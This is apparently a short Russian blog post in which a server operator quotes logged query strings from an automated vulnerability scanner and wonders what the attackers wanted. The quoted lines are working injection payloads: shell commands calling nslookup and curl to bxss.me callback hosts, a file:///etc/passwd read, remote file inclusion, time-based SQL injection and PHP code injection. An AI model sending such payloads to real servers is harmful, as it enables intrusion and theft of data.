Нехорошим хакерам что-то надо

Посмотрел что там -- а там творится ТАКОЕ ... )))
- Markup=On&OutMode=ECD&Query=(nslookup -q=cname hitwajrypmakbbe094.bxss.me||curl hitwajrypmakbbe094.bxss.me))&Range=0:200 - Markup=On&OutMode=ECD&Query=Http://bxss.me/t/fit.txt&Range=0:200 - Markup=On&OutMode=ECD&Query=file:///etc/passwd&Range=0:200 - Markup=On&OutMode=ECD&Query=$(nslookup -q=cname hitvkegmwfryh13dda.bxss.me||curl hitvkegmwfryh13dda.bxss.me)&Range=0:200 - Markup=On&OutMode=ECD&Query=http://bxss.me/t/fit.txt?.jpg&Range=0:200 - Markup=On&OutMode=ECD&Query=1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'&Range=50:60 - Markup=On&OutMode=ECD&Query=aoeVHu9D'; waitfor delay '0:0:15' -- &Range=20:30 - Markup=On&OutMode=ECD&Query=1 А§Аў'"&Range=50:60 - Markup=On&OutMode=ECD&Query=1&Range=0:10 20AND 2*3*8=6*8 AND 'z1cL'!='z1cL - Markup=On&OutMode=ECD&Query=q8yK44Vk') OR 723=(SELECT 723 FROM PG_SLEEP(15))--&Range=10:20 - Markup=On&OutMode=ECD&Query=|(nslookup -q=cname hitlwjwykhtjudeaec.bxss.me||curl hitlwjwykhtjudeaec.bxss.me)&Range=0:200 - Markup=On&OutMode=ECD&Query='.print(md5(31337)).'&Range=0:200 - Markup=On&OutMode=ECD&Query=`(nslookup -q=cname hitjpnrytetqge3683.bxss.me||curl hitjpnrytetqge3683.bxss.me)`&Range=0:200
(Ну, там ещё много всего такого. ))))
Если честно, я даже заинтригован.
Кто-то, видимо, считает, что параметр "Query" в запросе -- позволяет получить с сервера некий файл. Это не так. )))
Ну, почему их так интересует "/etc/passwd" -- ещё понятно.
Но все эти дикие попытки выполнить на нашем сервере "nslookup"? И какие-то безумные SQL-запросы??
Чего они вообще хотели этим добиться?? )))